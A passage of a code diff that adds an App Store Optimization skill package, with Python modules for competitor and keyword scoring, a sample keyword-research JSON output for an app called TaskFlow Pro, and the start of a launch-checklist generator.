                "Consider condensing description for better readability"
            )
            recommendations.append(
                "Focus on most important features first"
            )
        else:
            recommendations.append(
                "Description length is competitive"
            )

        return recommendations

    def _assess_competitive_position(
        self,
        your_analysis: Dict[str, Any],
        competitor_comparison: Dict[str, Any]
    ) -> str:
        """Assess your competitive position."""
        your_strength = your_analysis['competitive_strength']
        competitors = competitor_comparison['ranked_competitors']

        if not competitors:
            return "No comparison data available"

        # Find where you'd rank
        better_than_count = sum(
            1 for comp in competitors
            if your_strength > comp['competitive_strength']
        )

        position_percentage = (better_than_count / len(competitors)) * 100

        if position_percentage >= 75:
            return "Strong Position: Top quartile in competitive strength"
        elif position_percentage >= 50:
            return "Competitive Position: Above average, opportunities for improvement"
        elif position_percentage >= 25:
            return "Challenging Position: Below average, requires strategic improvements"
        else:
            return "Weak Position: Bottom quartile, major ASO overhaul needed"


def analyze_competitor_set(
    category: str,
    competitors_data: List[Dict[str, Any]],
    platform: str = 'apple'
) -> Dict[str, Any]:
    """
    Convenience function to analyze a set of competitors.

    Args:
        category: App category
        competitors_data: List of competitor data
        platform: 'apple' or 'google'

    Returns:
        Complete competitive analysis
    """
    analyzer = CompetitorAnalyzer(category, platform)
    return analyzer.compare_competitors(competitors_data)
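The 40/30/30 weighting in `_calculate_competitive_strength` reduces to a small standalone sketch. The saturation points (10,000 ratings and 2,000 description characters) are taken directly from the code above; the free-function form is just for illustration.

```python
def competitive_strength(rating: float, ratings_count: int, description_length: int) -> float:
    """Competitive strength on a 0-100 scale:
    rating quality 40%, rating volume 30%, metadata depth 30%."""
    # Rating quality: linear in the 0-5 star rating, up to 40 points
    rating_score = (rating / 5.0) * 40
    # Rating volume: saturates at 10,000 ratings, up to 30 points
    volume_score = min((ratings_count / 10000) * 30, 30)
    # Metadata depth: saturates at 2,000 description characters, up to 30 points
    metadata_score = min((description_length / 2000) * 30, 30)
    return round(rating_score + volume_score + metadata_score, 1)
```

A 4.0★ app with 5,000 ratings and a 1,000-character description lands at 32 + 15 + 15 = 62.0, which matches how mid-pack competitors score under this scheme.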
170 packages/llm/skills/app-store-optimization/expected_output.json Normal file
@@ -0,0 +1,170 @@
|
||||
{
|
||||
"request_type": "keyword_research",
|
||||
"app_name": "TaskFlow Pro",
|
||||
"keyword_analysis": {
|
||||
"total_keywords_analyzed": 25,
|
||||
"primary_keywords": [
|
||||
{
|
||||
"keyword": "task manager",
|
||||
"search_volume": 45000,
|
||||
"competition_level": "high",
|
||||
"relevance_score": 0.95,
|
||||
"difficulty_score": 72.5,
|
||||
"potential_score": 78.3,
|
||||
"recommendation": "High priority - target immediately"
|
||||
},
|
||||
{
|
||||
"keyword": "productivity app",
|
||||
"search_volume": 38000,
|
||||
"competition_level": "high",
|
||||
"relevance_score": 0.90,
|
||||
"difficulty_score": 68.2,
|
||||
"potential_score": 75.1,
|
||||
"recommendation": "High priority - target immediately"
|
||||
},
|
||||
{
|
||||
"keyword": "todo list",
|
||||
"search_volume": 52000,
|
||||
"competition_level": "very_high",
|
||||
"relevance_score": 0.85,
|
||||
"difficulty_score": 78.9,
|
||||
"potential_score": 71.4,
|
||||
"recommendation": "High priority - target immediately"
|
||||
}
|
||||
],
|
||||
"secondary_keywords": [
|
||||
{
|
||||
"keyword": "team task manager",
|
||||
"search_volume": 8500,
|
||||
"competition_level": "medium",
|
||||
"relevance_score": 0.88,
|
||||
"difficulty_score": 42.3,
|
||||
"potential_score": 68.7,
|
||||
"recommendation": "Good opportunity - include in metadata"
|
||||
},
|
||||
{
|
||||
"keyword": "project planning app",
|
||||
"search_volume": 12000,
|
||||
"competition_level": "medium",
|
||||
"relevance_score": 0.75,
|
||||
"difficulty_score": 48.1,
|
||||
"potential_score": 64.2,
|
||||
"recommendation": "Good opportunity - include in metadata"
|
||||
}
|
||||
],
|
||||
"long_tail_keywords": [
|
||||
{
|
||||
"keyword": "ai task prioritization",
|
||||
"search_volume": 2800,
|
||||
"competition_level": "low",
|
||||
"relevance_score": 0.95,
|
||||
"difficulty_score": 25.4,
|
||||
"potential_score": 82.6,
|
||||
"recommendation": "Excellent long-tail opportunity"
|
||||
},
|
||||
{
|
||||
"keyword": "team productivity tool",
|
||||
"search_volume": 3500,
|
||||
"competition_level": "low",
|
||||
"relevance_score": 0.85,
|
||||
"difficulty_score": 28.7,
|
||||
"potential_score": 79.3,
|
||||
"recommendation": "Excellent long-tail opportunity"
|
||||
}
|
||||
]
|
||||
},
|
||||
"competitor_insights": {
|
||||
"competitors_analyzed": 4,
|
||||
"common_keywords": [
|
||||
"task",
|
||||
"todo",
|
||||
"list",
|
||||
"productivity",
|
||||
"organize",
|
||||
"manage"
|
||||
],
|
||||
"keyword_gaps": [
|
||||
{
|
||||
"keyword": "ai prioritization",
|
||||
"used_by": ["None of the major competitors"],
|
||||
"opportunity": "Unique positioning opportunity"
|
||||
},
|
||||
{
|
||||
"keyword": "smart task manager",
|
||||
"used_by": ["Things 3"],
|
||||
"opportunity": "Underutilized by most competitors"
|
||||
}
|
||||
]
|
||||
},
|
||||
"metadata_recommendations": {
|
||||
"apple_app_store": {
|
||||
"title_options": [
|
||||
{
|
||||
"title": "TaskFlow - AI Task Manager",
|
||||
"length": 26,
|
||||
"keywords_included": ["task manager", "ai"],
|
||||
"strategy": "brand_plus_primary"
|
||||
},
|
||||
{
|
||||
"title": "TaskFlow: Smart Todo & Tasks",
|
||||
"length": 29,
|
||||
"keywords_included": ["todo", "tasks"],
|
||||
"strategy": "brand_plus_multiple"
|
||||
}
|
||||
],
|
||||
"subtitle_recommendation": "AI-Powered Team Productivity",
|
||||
"keyword_field": "productivity,organize,planner,schedule,workflow,reminders,collaboration,calendar,sync,priorities",
|
||||
"description_focus": "Lead with AI differentiation, emphasize team features"
|
||||
},
|
||||
"google_play_store": {
|
||||
"title_options": [
|
||||
{
|
||||
"title": "TaskFlow - AI Task Manager & Team Productivity",
|
||||
"length": 48,
|
||||
"keywords_included": ["task manager", "ai", "team", "productivity"],
|
||||
"strategy": "keyword_rich"
|
||||
}
|
||||
],
|
||||
"short_description_recommendation": "AI task manager - Organize, prioritize, and collaborate with your team",
|
||||
"description_focus": "Keywords naturally integrated throughout 4000 character description"
|
||||
}
|
||||
},
|
||||
"strategic_recommendations": [
|
||||
"Focus on 'AI prioritization' as unique differentiator - low competition, high relevance",
|
||||
"Target 'team task manager' and 'team productivity' keywords - good search volume, lower competition than generic terms",
|
||||
"Include long-tail keywords in description for additional discovery opportunities",
|
||||
"Test title variations with A/B testing after launch",
|
||||
"Monitor competitor keyword changes quarterly"
|
||||
],
|
||||
"priority_actions": [
|
||||
{
|
||||
"action": "Optimize app title with primary keyword",
|
||||
"priority": "high",
|
||||
"expected_impact": "15-25% improvement in search visibility"
|
||||
},
|
||||
{
|
||||
"action": "Create description highlighting AI features with natural keyword integration",
|
||||
"priority": "high",
|
||||
"expected_impact": "10-15% improvement in conversion rate"
|
||||
},
|
||||
{
|
||||
"action": "Plan A/B tests for icon and screenshots post-launch",
|
||||
"priority": "medium",
|
||||
"expected_impact": "5-10% improvement in conversion rate"
|
||||
}
|
||||
],
|
||||
"aso_health_estimate": {
|
||||
"current_score": "N/A (pre-launch)",
|
||||
"potential_score_with_optimizations": "75-80/100",
|
||||
"key_strengths": [
|
||||
"Unique AI differentiation",
|
||||
"Clear target audience",
|
||||
"Strong feature set"
|
||||
],
|
||||
"areas_to_develop": [
|
||||
"Build rating volume post-launch",
|
||||
"Monitor and respond to reviews",
|
||||
"Continuous keyword optimization"
|
||||
]
|
||||
}
|
||||
}
|
||||
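Because the report above is plain JSON, downstream tooling can filter it directly, e.g. to surface only the high-priority actions. A minimal sketch; the inline document below is a trimmed, hypothetical copy of the `priority_actions` structure above:

```python
import json

# Trimmed, hypothetical copy of the priority_actions structure above.
report = json.loads("""
{
  "priority_actions": [
    {"action": "Optimize app title with primary keyword", "priority": "high"},
    {"action": "Plan A/B tests for icon and screenshots post-launch", "priority": "medium"}
  ]
}
""")

# Keep only the high-priority actions.
high_priority = [a["action"] for a in report["priority_actions"] if a["priority"] == "high"]
print(high_priority)  # ['Optimize app title with primary keyword']
```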
406 packages/llm/skills/app-store-optimization/keyword_analyzer.py Normal file
@@ -0,0 +1,406 @@
"""
|
||||
Keyword analysis module for App Store Optimization.
|
||||
Analyzes keyword search volume, competition, and relevance for app discovery.
|
||||
"""
|
||||
|
||||
from typing import Dict, List, Any, Optional, Tuple
|
||||
import re
|
||||
from collections import Counter
|
||||
|
||||
|
||||
class KeywordAnalyzer:
|
||||
"""Analyzes keywords for ASO effectiveness."""
|
||||
|
||||
# Competition level thresholds (based on number of competing apps)
|
||||
COMPETITION_THRESHOLDS = {
|
||||
'low': 1000,
|
||||
'medium': 5000,
|
||||
'high': 10000
|
||||
}
|
||||
|
||||
# Search volume categories (monthly searches estimate)
|
||||
VOLUME_CATEGORIES = {
|
||||
'very_low': 1000,
|
||||
'low': 5000,
|
||||
'medium': 20000,
|
||||
'high': 100000,
|
||||
'very_high': 500000
|
||||
}
|
||||
|
||||
def __init__(self):
|
||||
"""Initialize keyword analyzer."""
|
||||
self.analyzed_keywords = {}
|
||||
|
||||
def analyze_keyword(
|
||||
self,
|
||||
keyword: str,
|
||||
search_volume: int = 0,
|
||||
competing_apps: int = 0,
|
||||
relevance_score: float = 0.0
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Analyze a single keyword for ASO potential.
|
||||
|
||||
Args:
|
||||
keyword: The keyword to analyze
|
||||
search_volume: Estimated monthly search volume
|
||||
competing_apps: Number of apps competing for this keyword
|
||||
relevance_score: Relevance to your app (0.0-1.0)
|
||||
|
||||
Returns:
|
||||
Dictionary with keyword analysis
|
||||
"""
|
||||
competition_level = self._calculate_competition_level(competing_apps)
|
||||
volume_category = self._categorize_search_volume(search_volume)
|
||||
difficulty_score = self._calculate_keyword_difficulty(
|
||||
search_volume,
|
||||
competing_apps
|
||||
)
|
||||
|
||||
# Calculate potential score (0-100)
|
||||
potential_score = self._calculate_potential_score(
|
||||
search_volume,
|
||||
competing_apps,
|
||||
relevance_score
|
||||
)
|
||||
|
||||
analysis = {
|
||||
'keyword': keyword,
|
||||
'search_volume': search_volume,
|
||||
'volume_category': volume_category,
|
||||
'competing_apps': competing_apps,
|
||||
'competition_level': competition_level,
|
||||
'relevance_score': relevance_score,
|
||||
'difficulty_score': difficulty_score,
|
||||
'potential_score': potential_score,
|
||||
'recommendation': self._generate_recommendation(
|
||||
potential_score,
|
||||
difficulty_score,
|
||||
relevance_score
|
||||
),
|
||||
'keyword_length': len(keyword.split()),
|
||||
'is_long_tail': len(keyword.split()) >= 3
|
||||
}
|
||||
|
||||
self.analyzed_keywords[keyword] = analysis
|
||||
return analysis
|
||||
|
||||
def compare_keywords(self, keywords_data: List[Dict[str, Any]]) -> Dict[str, Any]:
|
||||
"""
|
||||
Compare multiple keywords and rank by potential.
|
||||
|
||||
Args:
|
||||
keywords_data: List of dicts with keyword, search_volume, competing_apps, relevance_score
|
||||
|
||||
Returns:
|
||||
Comparison report with ranked keywords
|
||||
"""
|
||||
analyses = []
|
||||
for kw_data in keywords_data:
|
||||
analysis = self.analyze_keyword(
|
||||
keyword=kw_data['keyword'],
|
||||
search_volume=kw_data.get('search_volume', 0),
|
||||
competing_apps=kw_data.get('competing_apps', 0),
|
||||
relevance_score=kw_data.get('relevance_score', 0.0)
|
||||
)
|
||||
analyses.append(analysis)
|
||||
|
||||
# Sort by potential score (descending)
|
||||
ranked_keywords = sorted(
|
||||
analyses,
|
||||
key=lambda x: x['potential_score'],
|
||||
reverse=True
|
||||
)
|
||||
|
||||
# Categorize keywords
|
||||
primary_keywords = [
|
||||
kw for kw in ranked_keywords
|
||||
if kw['potential_score'] >= 70 and kw['relevance_score'] >= 0.8
|
||||
]
|
||||
|
||||
secondary_keywords = [
|
||||
kw for kw in ranked_keywords
|
||||
if 50 <= kw['potential_score'] < 70 and kw['relevance_score'] >= 0.6
|
||||
]
|
||||
|
||||
long_tail_keywords = [
|
||||
kw for kw in ranked_keywords
|
||||
if kw['is_long_tail'] and kw['relevance_score'] >= 0.7
|
||||
]
|
||||
|
||||
return {
|
||||
'total_keywords_analyzed': len(analyses),
|
||||
'ranked_keywords': ranked_keywords,
|
||||
'primary_keywords': primary_keywords[:5], # Top 5
|
||||
'secondary_keywords': secondary_keywords[:10], # Top 10
|
||||
'long_tail_keywords': long_tail_keywords[:10], # Top 10
|
||||
'summary': self._generate_comparison_summary(
|
||||
primary_keywords,
|
||||
secondary_keywords,
|
||||
long_tail_keywords
|
||||
)
|
||||
}
|
||||
|
||||
def find_long_tail_opportunities(
|
||||
self,
|
||||
base_keyword: str,
|
||||
modifiers: List[str]
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""
|
||||
Generate long-tail keyword variations.
|
||||
|
||||
Args:
|
||||
base_keyword: Core keyword (e.g., "task manager")
|
||||
modifiers: List of modifiers (e.g., ["free", "simple", "team"])
|
||||
|
||||
Returns:
|
||||
List of long-tail keyword suggestions
|
||||
"""
|
||||
long_tail_keywords = []
|
||||
|
||||
# Generate combinations
|
||||
for modifier in modifiers:
|
||||
# Modifier + base
|
||||
variation1 = f"{modifier} {base_keyword}"
|
||||
long_tail_keywords.append({
|
||||
'keyword': variation1,
|
||||
'pattern': 'modifier_base',
|
||||
'estimated_competition': 'low',
|
||||
'rationale': f"Less competitive variation of '{base_keyword}'"
|
||||
})
|
||||
|
||||
# Base + modifier
|
||||
variation2 = f"{base_keyword} {modifier}"
|
||||
long_tail_keywords.append({
|
||||
'keyword': variation2,
|
||||
'pattern': 'base_modifier',
|
||||
'estimated_competition': 'low',
|
||||
'rationale': f"Specific use-case variation of '{base_keyword}'"
|
||||
})
|
||||
|
||||
# Add question-based long-tail
|
||||
question_words = ['how', 'what', 'best', 'top']
|
||||
for q_word in question_words:
|
||||
question_keyword = f"{q_word} {base_keyword}"
|
||||
long_tail_keywords.append({
|
||||
'keyword': question_keyword,
|
||||
'pattern': 'question_based',
|
||||
'estimated_competition': 'very_low',
|
||||
'rationale': f"Informational search query"
|
||||
})
|
||||
|
||||
return long_tail_keywords
|
||||
|
||||
def extract_keywords_from_text(
|
||||
self,
|
||||
text: str,
|
||||
min_word_length: int = 3
|
||||
) -> List[Tuple[str, int]]:
|
||||
"""
|
||||
Extract potential keywords from text (descriptions, reviews).
|
||||
|
||||
Args:
|
||||
text: Text to analyze
|
||||
min_word_length: Minimum word length to consider
|
||||
|
||||
Returns:
|
||||
List of (keyword, frequency) tuples
|
||||
"""
|
||||
# Clean and normalize text
|
||||
text = text.lower()
|
||||
text = re.sub(r'[^\w\s]', ' ', text)
|
||||
|
||||
# Extract words
|
||||
words = text.split()
|
||||
|
||||
# Filter by length
|
||||
words = [w for w in words if len(w) >= min_word_length]
|
||||
|
||||
# Remove common stop words
|
||||
stop_words = {
|
||||
'the', 'and', 'for', 'with', 'this', 'that', 'from', 'have',
|
||||
'but', 'not', 'you', 'all', 'can', 'are', 'was', 'were', 'been'
|
||||
}
|
||||
words = [w for w in words if w not in stop_words]
|
||||
|
||||
# Count frequency
|
||||
word_counts = Counter(words)
|
||||
|
||||
# Extract 2-word phrases
|
||||
phrases = []
|
||||
for i in range(len(words) - 1):
|
||||
phrase = f"{words[i]} {words[i+1]}"
|
||||
phrases.append(phrase)
|
||||
|
||||
phrase_counts = Counter(phrases)
|
||||
|
||||
# Combine and sort
|
||||
all_keywords = list(word_counts.items()) + list(phrase_counts.items())
|
||||
all_keywords.sort(key=lambda x: x[1], reverse=True)
|
||||
|
||||
return all_keywords[:50] # Top 50
|
||||
|
||||
def calculate_keyword_density(
|
||||
self,
|
||||
text: str,
|
||||
target_keywords: List[str]
|
||||
) -> Dict[str, float]:
|
||||
"""
|
||||
Calculate keyword density in text.
|
||||
|
||||
Args:
|
||||
text: Text to analyze (title, description)
|
||||
target_keywords: Keywords to check density for
|
||||
|
||||
Returns:
|
||||
Dictionary of keyword: density (percentage)
|
||||
"""
|
||||
text_lower = text.lower()
|
||||
total_words = len(text_lower.split())
|
||||
|
||||
densities = {}
|
||||
for keyword in target_keywords:
|
||||
keyword_lower = keyword.lower()
|
||||
occurrences = text_lower.count(keyword_lower)
|
||||
density = (occurrences / total_words) * 100 if total_words > 0 else 0
|
||||
densities[keyword] = round(density, 2)
|
||||
|
||||
return densities
|
||||
|
||||
def _calculate_competition_level(self, competing_apps: int) -> str:
|
||||
"""Determine competition level based on number of competing apps."""
|
||||
if competing_apps < self.COMPETITION_THRESHOLDS['low']:
|
||||
return 'low'
|
||||
elif competing_apps < self.COMPETITION_THRESHOLDS['medium']:
|
||||
return 'medium'
|
||||
elif competing_apps < self.COMPETITION_THRESHOLDS['high']:
|
||||
return 'high'
|
||||
else:
|
||||
return 'very_high'
|
||||
|
||||
def _categorize_search_volume(self, search_volume: int) -> str:
|
||||
"""Categorize search volume."""
|
||||
if search_volume < self.VOLUME_CATEGORIES['very_low']:
|
||||
return 'very_low'
|
||||
elif search_volume < self.VOLUME_CATEGORIES['low']:
|
||||
return 'low'
|
||||
elif search_volume < self.VOLUME_CATEGORIES['medium']:
|
||||
return 'medium'
|
||||
elif search_volume < self.VOLUME_CATEGORIES['high']:
|
||||
return 'high'
|
||||
else:
|
||||
return 'very_high'
|
||||
|
||||
def _calculate_keyword_difficulty(
|
||||
self,
|
||||
search_volume: int,
|
||||
competing_apps: int
|
||||
) -> float:
|
||||
"""
|
||||
Calculate keyword difficulty score (0-100).
|
||||
Higher score = harder to rank.
|
||||
"""
|
||||
if competing_apps == 0:
|
||||
return 0.0
|
||||
|
||||
# Competition factor (0-1)
|
||||
competition_factor = min(competing_apps / 50000, 1.0)
|
||||
|
||||
# Volume factor (0-1) - higher volume = more difficulty
|
||||
volume_factor = min(search_volume / 1000000, 1.0)
|
||||
|
||||
# Difficulty score (weighted average)
|
||||
difficulty = (competition_factor * 0.7 + volume_factor * 0.3) * 100
|
||||
|
||||
return round(difficulty, 1)
|
||||
|
||||
def _calculate_potential_score(
|
||||
self,
|
||||
search_volume: int,
|
||||
competing_apps: int,
|
||||
relevance_score: float
|
||||
) -> float:
|
||||
"""
|
||||
Calculate overall keyword potential (0-100).
|
||||
Higher score = better opportunity.
|
||||
"""
|
||||
# Volume score (0-40 points)
|
||||
volume_score = min((search_volume / 100000) * 40, 40)
|
||||
|
||||
# Competition score (0-30 points) - inverse relationship
|
||||
if competing_apps > 0:
|
||||
competition_score = max(30 - (competing_apps / 500), 0)
|
||||
else:
|
||||
competition_score = 30
|
||||
|
||||
# Relevance score (0-30 points)
|
||||
relevance_points = relevance_score * 30
|
||||
|
||||
total_score = volume_score + competition_score + relevance_points
|
||||
|
||||
return round(min(total_score, 100), 1)
|
||||
|
||||
def _generate_recommendation(
|
||||
self,
|
||||
potential_score: float,
|
||||
difficulty_score: float,
|
||||
relevance_score: float
|
||||
) -> str:
|
||||
"""Generate actionable recommendation for keyword."""
|
||||
if relevance_score < 0.5:
|
||||
return "Low relevance - avoid targeting"
|
||||
|
||||
if potential_score >= 70:
|
||||
return "High priority - target immediately"
|
||||
elif potential_score >= 50:
|
||||
if difficulty_score < 50:
|
||||
return "Good opportunity - include in metadata"
|
||||
else:
|
||||
return "Competitive - use in description, not title"
|
||||
elif potential_score >= 30:
|
||||
return "Secondary keyword - use for long-tail variations"
|
||||
else:
|
||||
return "Low potential - deprioritize"
|
||||
|
||||
def _generate_comparison_summary(
|
||||
self,
|
||||
primary_keywords: List[Dict[str, Any]],
|
||||
secondary_keywords: List[Dict[str, Any]],
|
||||
long_tail_keywords: List[Dict[str, Any]]
|
||||
) -> str:
|
||||
"""Generate summary of keyword comparison."""
|
||||
summary_parts = []
|
||||
|
||||
summary_parts.append(
|
||||
f"Identified {len(primary_keywords)} high-priority primary keywords."
|
||||
)
|
||||
|
||||
if primary_keywords:
|
||||
top_keyword = primary_keywords[0]['keyword']
|
||||
summary_parts.append(
|
||||
f"Top recommendation: '{top_keyword}' (potential score: {primary_keywords[0]['potential_score']})."
|
||||
)
|
||||
|
||||
summary_parts.append(
|
||||
f"Found {len(secondary_keywords)} secondary keywords for description and metadata."
|
||||
)
|
||||
|
||||
summary_parts.append(
|
||||
f"Discovered {len(long_tail_keywords)} long-tail opportunities with lower competition."
|
||||
)
|
||||
|
||||
return " ".join(summary_parts)
|
||||
|
||||
|
||||
def analyze_keyword_set(keywords_data: List[Dict[str, Any]]) -> Dict[str, Any]:
|
||||
"""
|
||||
Convenience function to analyze a set of keywords.
|
||||
|
||||
Args:
|
||||
keywords_data: List of keyword data dictionaries
|
||||
|
||||
Returns:
|
||||
Complete analysis report
|
||||
"""
|
||||
analyzer = KeywordAnalyzer()
|
||||
return analyzer.compare_keywords(keywords_data)
|
||||
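The scoring in `_calculate_potential_score` can be traced by hand. A worked sketch with hypothetical inputs; the arithmetic mirrors the method's formula (volume up to 40 points, competition up to 30, relevance up to 30):

```python
# Hypothetical keyword metrics, mirroring _calculate_potential_score above.
search_volume = 20000     # estimated monthly searches
competing_apps = 2000     # apps competing for this keyword
relevance_score = 0.9     # relevance to the app (0.0-1.0)

volume_score = min((search_volume / 100000) * 40, 40)    # 8.0 of 40 points
competition_score = max(30 - (competing_apps / 500), 0)  # 26.0 of 30 points
relevance_points = relevance_score * 30                  # 27.0 of 30 points

potential = round(min(volume_score + competition_score + relevance_points, 100), 1)
print(potential)  # 61.0
```

A score of 61.0 with low difficulty lands in the "Good opportunity - include in metadata" band of `_generate_recommendation`.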
739 packages/llm/skills/app-store-optimization/launch_checklist.py Normal file
@@ -0,0 +1,739 @@
"""
|
||||
Launch checklist module for App Store Optimization.
|
||||
Generates comprehensive pre-launch and update checklists.
|
||||
"""
|
||||
|
||||
from typing import Dict, List, Any, Optional
|
||||
from datetime import datetime, timedelta
|
||||
|
||||
|
||||
class LaunchChecklistGenerator:
|
||||
"""Generates comprehensive checklists for app launches and updates."""
|
||||
|
||||
def __init__(self, platform: str = 'both'):
|
||||
"""
|
||||
Initialize checklist generator.
|
||||
|
||||
Args:
|
||||
platform: 'apple', 'google', or 'both'
|
||||
"""
|
||||
if platform not in ['apple', 'google', 'both']:
|
||||
raise ValueError("Platform must be 'apple', 'google', or 'both'")
|
||||
|
||||
self.platform = platform
|
||||
|
||||
def generate_prelaunch_checklist(
|
||||
self,
|
||||
app_info: Dict[str, Any],
|
||||
launch_date: Optional[str] = None
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Generate comprehensive pre-launch checklist.
|
||||
|
||||
Args:
|
||||
app_info: App information (name, category, target_audience)
|
||||
launch_date: Target launch date (YYYY-MM-DD)
|
||||
|
||||
Returns:
|
||||
Complete pre-launch checklist
|
||||
"""
|
||||
checklist = {
|
||||
'app_info': app_info,
|
||||
'launch_date': launch_date,
|
||||
'checklists': {}
|
||||
}
|
||||
|
||||
# Generate platform-specific checklists
|
||||
if self.platform in ['apple', 'both']:
|
||||
checklist['checklists']['apple'] = self._generate_apple_checklist(app_info)
|
||||
|
||||
if self.platform in ['google', 'both']:
|
||||
checklist['checklists']['google'] = self._generate_google_checklist(app_info)
|
||||
|
||||
# Add universal checklist items
|
||||
checklist['checklists']['universal'] = self._generate_universal_checklist(app_info)
|
||||
|
||||
# Generate timeline
|
||||
if launch_date:
|
||||
checklist['timeline'] = self._generate_launch_timeline(launch_date)
|
||||
|
||||
# Calculate completion status
|
||||
checklist['summary'] = self._calculate_checklist_summary(checklist['checklists'])
|
||||
|
||||
return checklist
|
||||
|
||||
def validate_app_store_compliance(
|
||||
self,
|
||||
app_data: Dict[str, Any],
|
||||
platform: str = 'apple'
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Validate compliance with app store guidelines.
|
||||
|
||||
Args:
|
||||
app_data: App data including metadata, privacy policy, etc.
|
||||
platform: 'apple' or 'google'
|
||||
|
||||
Returns:
|
||||
Compliance validation report
|
||||
"""
|
||||
validation_results = {
|
||||
'platform': platform,
|
||||
'is_compliant': True,
|
||||
'errors': [],
|
||||
'warnings': [],
|
||||
'recommendations': []
|
||||
}
|
||||
|
||||
if platform == 'apple':
|
||||
self._validate_apple_compliance(app_data, validation_results)
|
||||
elif platform == 'google':
|
||||
self._validate_google_compliance(app_data, validation_results)
|
||||
|
||||
# Determine overall compliance
|
||||
validation_results['is_compliant'] = len(validation_results['errors']) == 0
|
||||
|
||||
return validation_results
|
||||
|
||||
def create_update_plan(
|
||||
self,
|
||||
current_version: str,
|
||||
planned_features: List[str],
|
||||
update_frequency: str = 'monthly'
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Create update cadence and feature rollout plan.
|
||||
|
||||
Args:
|
||||
current_version: Current app version
|
||||
planned_features: List of planned features
|
||||
update_frequency: 'weekly', 'biweekly', 'monthly', 'quarterly'
|
||||
|
||||
Returns:
|
||||
Update plan with cadence and feature schedule
|
||||
"""
|
||||
# Calculate next versions
|
||||
next_versions = self._calculate_next_versions(
|
||||
current_version,
|
||||
update_frequency,
|
||||
len(planned_features)
|
||||
)
|
||||
|
||||
# Distribute features across versions
|
||||
feature_schedule = self._distribute_features(
|
||||
planned_features,
|
||||
next_versions
|
||||
)
|
||||
|
||||
# Generate "What's New" templates
|
||||
whats_new_templates = [
|
||||
self._generate_whats_new_template(version_data)
|
||||
for version_data in feature_schedule
|
||||
]
|
||||
|
||||
return {
|
||||
'current_version': current_version,
|
||||
'update_frequency': update_frequency,
|
||||
'planned_updates': len(feature_schedule),
|
||||
'feature_schedule': feature_schedule,
|
||||
'whats_new_templates': whats_new_templates,
|
||||
'recommendations': self._generate_update_recommendations(update_frequency)
|
||||
}
|
||||
|
||||
def optimize_launch_timing(
|
||||
self,
|
||||
app_category: str,
|
||||
target_audience: str,
|
||||
current_date: Optional[str] = None
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Recommend optimal launch timing.
|
||||
|
||||
Args:
|
||||
app_category: App category
|
||||
target_audience: Target audience description
|
||||
current_date: Current date (YYYY-MM-DD), defaults to today
|
||||
|
||||
Returns:
|
||||
Launch timing recommendations
|
||||
"""
|
||||
if not current_date:
|
||||
current_date = datetime.now().strftime('%Y-%m-%d')
|
||||
|
||||
# Analyze launch timing factors
|
||||
day_of_week_rec = self._recommend_day_of_week(app_category)
|
||||
seasonal_rec = self._recommend_seasonal_timing(app_category, current_date)
|
||||
competitive_rec = self._analyze_competitive_timing(app_category)
|
||||
|
||||
# Calculate optimal dates
|
||||
optimal_dates = self._calculate_optimal_dates(
|
||||
current_date,
|
||||
day_of_week_rec,
|
||||
seasonal_rec
|
||||
)
|
||||
|
||||
return {
|
||||
'current_date': current_date,
|
||||
'optimal_launch_dates': optimal_dates,
|
||||
'day_of_week_recommendation': day_of_week_rec,
|
||||
'seasonal_considerations': seasonal_rec,
|
||||
'competitive_timing': competitive_rec,
|
||||
'final_recommendation': self._generate_timing_recommendation(
|
||||
optimal_dates,
|
||||
seasonal_rec
|
||||
)
|
||||
}
|
||||
|
||||
def plan_seasonal_campaigns(
|
||||
self,
|
||||
app_category: str,
|
||||
current_month: int = None
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Identify seasonal opportunities for ASO campaigns.
|
||||
|
||||
Args:
|
||||
app_category: App category
|
||||
current_month: Current month (1-12), defaults to current
|
||||
|
||||
Returns:
|
||||
Seasonal campaign opportunities
|
||||
"""
|
||||
if not current_month:
|
||||
current_month = datetime.now().month
|
||||
|
||||
# Identify relevant seasonal events
|
||||
seasonal_opportunities = self._identify_seasonal_opportunities(
|
||||
app_category,
|
||||
current_month
|
||||
)
|
||||
|
||||
# Generate campaign ideas
|
||||
campaigns = [
|
||||
self._generate_seasonal_campaign(opportunity)
|
||||
for opportunity in seasonal_opportunities
|
||||
]
|
||||
|
||||
return {
|
||||
'current_month': current_month,
|
||||
'category': app_category,
|
||||
'seasonal_opportunities': seasonal_opportunities,
|
||||
'campaign_ideas': campaigns,
|
||||
'implementation_timeline': self._create_seasonal_timeline(campaigns)
|
||||
}
|
||||
|
||||
def _generate_apple_checklist(self, app_info: Dict[str, Any]) -> List[Dict[str, Any]]:
|
||||
"""Generate Apple App Store specific checklist."""
|
||||
return [
|
||||
{
|
||||
'category': 'App Store Connect Setup',
|
||||
'items': [
|
||||
{'task': 'App Store Connect account created', 'status': 'pending'},
|
||||
{'task': 'App bundle ID registered', 'status': 'pending'},
|
||||
{'task': 'App Privacy declarations completed', 'status': 'pending'},
|
||||
{'task': 'Age rating questionnaire completed', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Metadata (Apple)',
|
||||
'items': [
|
||||
{'task': 'App title (30 chars max)', 'status': 'pending'},
|
||||
{'task': 'Subtitle (30 chars max)', 'status': 'pending'},
|
||||
{'task': 'Promotional text (170 chars max)', 'status': 'pending'},
|
||||
{'task': 'Description (4000 chars max)', 'status': 'pending'},
|
||||
{'task': 'Keywords (100 chars, comma-separated)', 'status': 'pending'},
|
||||
{'task': 'Category selection (primary + secondary)', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Visual Assets (Apple)',
|
||||
'items': [
|
||||
{'task': 'App icon (1024x1024px)', 'status': 'pending'},
|
||||
{'task': 'Screenshots (iPhone 6.7" required)', 'status': 'pending'},
|
||||
{'task': 'Screenshots (iPhone 5.5" required)', 'status': 'pending'},
|
||||
{'task': 'Screenshots (iPad Pro 12.9" if iPad app)', 'status': 'pending'},
|
||||
{'task': 'App preview video (optional but recommended)', 'status': 'pending'}
|
||||
]
|
||||
},
|
||||
{
|
||||
'category': 'Technical Requirements (Apple)',
|
||||
'items': [
|
||||
{'task': 'Build uploaded to App Store Connect', 'status': 'pending'},
|
||||
{'task': 'TestFlight testing completed', 'status': 'pending'},
|
||||
